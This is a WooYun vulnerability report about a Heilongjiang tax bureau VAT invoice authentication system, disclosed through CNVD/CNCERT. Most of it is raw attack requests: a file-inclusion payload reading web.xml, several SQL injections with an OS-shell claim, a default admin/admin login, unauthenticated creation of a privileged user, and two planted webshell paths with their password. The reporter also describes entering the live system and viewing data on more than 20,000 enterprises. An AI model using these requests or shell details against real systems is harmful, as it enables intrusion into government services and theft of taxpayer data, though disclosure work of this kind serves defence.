当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155648

漏洞标题:黑龙江省国税局某系统漏洞打包(文件包含,sql注入多处,未授权访问,getshell等)

相关厂商:黑龙江省国税局

漏洞作者: 路人甲

提交时间:2015-11-25 14:58

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

漏洞打包(文件包含,sql注入多处,未授权访问,getshell,20000+企业信息等)
看我打包这么多,给个首页吧,守榜不容易啊
~本来藏着是打算找个通用的

详细说明:

http://**.**.**.**:8700/
黑龙江省国税局增值税专用发票抵扣联信息认证系统

QQ截图20151124211515.png


1#文件包含

POST http://**.**.**.**:8700/changePass HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**:8700/ChangePassword1.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8700
Content-Length: 121
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=WS2f7PNPyJhmnwS2qvf2FVTnnMJ1wxTGfFgL8KMy721kyKxJhb9f!-2087357998
Username=null&oldpassword=123&newpassword=123&PwdConfirm=123&Submit=+%C8%B7+%EF%BF%BD%EF%BF%BD+&page=%2FWEB-INF%2Fweb.xml


注意参数page

QQ截图20151124211640.png


2#sql注入(目测登录口那个已经被发现了,我这个是忘记密码的,不是同一处)

POST http://**.**.**.**:8700/changePass HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**:8700/ChangePassword1.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8700
Content-Length: 111
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=WS2f7PNPyJhmnwS2qvf2FVTnnMJ1wxTGfFgL8KMy721kyKxJhb9f!-2087357998
Username=admin&oldpassword=123&newpassword=123&PwdConfirm=123&Submit=+%C8%B7+%B6%A8+&page=%2FChangePassword1.jsp


QQ截图20151124211128.png


QQ截图20151124211158.png


支持--os-shell

QQ截图20151124211411.png


可写shell

QQ截图20151124211808.png

漏洞证明:

登录口那处我也补一个呗,万一不是这个系统呢

POST http://**.**.**.**:8700/CheckLoginServlet HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**:8700/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8700
Content-Length: 37
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=WJh12qsKpm8xlXTSQm1rGwFNwnlz55hF9pSxggwPrQvzP6J190tm!-2087357998
UserName=admin&Password=admin&x=0&y=0


3#未授权访问(这个比较有意思)
http://**.**.**.**:8700/Add_User.jsp

QQ截图20151124212007.png


点击检索用户

QQ截图20151124212030.png


这个请求包是直接发sql语句,比较奇葩

QQ截图20151124212115.png


虽然知道了用户密码,但解密不了,所以我们新增
权限一定要多

QQ截图20151124212249.png


QQ截图20151124212313.png


你懂的
进系统了

QQ截图20151124212340.png


20000+企业信息

QQ截图20151124212426.png


其实进了系统你才会知道,这系统到处都是注入,到处都是包含,你要做的就是尝试

POST http://**.**.**.**:8700/UserInfoServlet?action_type=query HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**:8700/query.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8700
Content-Length: 91
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=WJh12qsKpm8xlXTSQm1rGwFNwnlz55hF9pSxggwPrQvzP6J190tm!-2087357998
UserID=2&UserName=1&donet_type=1&douser_type=1&repages=%2Fquery.jsp&totalsize=1&pageno=1


QQ截图20151124213708.png


POST http://**.**.**.**:8700/ErrorDataListServlet?action_type=query HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**:8700/ErrorDataList.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8700
Content-Length: 112
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=WJh12qsKpm8xlXTSQm1rGwFNwnlz55hF9pSxggwPrQvzP6J190tm!-2087357998
nsrList=2&nsrName=&OpeType=3&dfrom=20151101&dto=20151124&repages=%2FErrorDataList.jsp&totalsize=null&pageno=null


QQ截图20151124213543.png


QQ截图20151124213920.png


太多处了不一一跑出结果了
4#shell

QQ截图20151124213849.png


找呀找呀找路径
shell:http://**.**.**.**:8700/wpp.jsp
http://**.**.**.**:8700/haoma.jsp

QQ截图20151124214842.png


密码:4423054

QQ截图20151124215030.png


QQ截图20151124215039.png

修复方案:

下线,找厂商要补丁

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-11-27 15:10

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发黑龙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无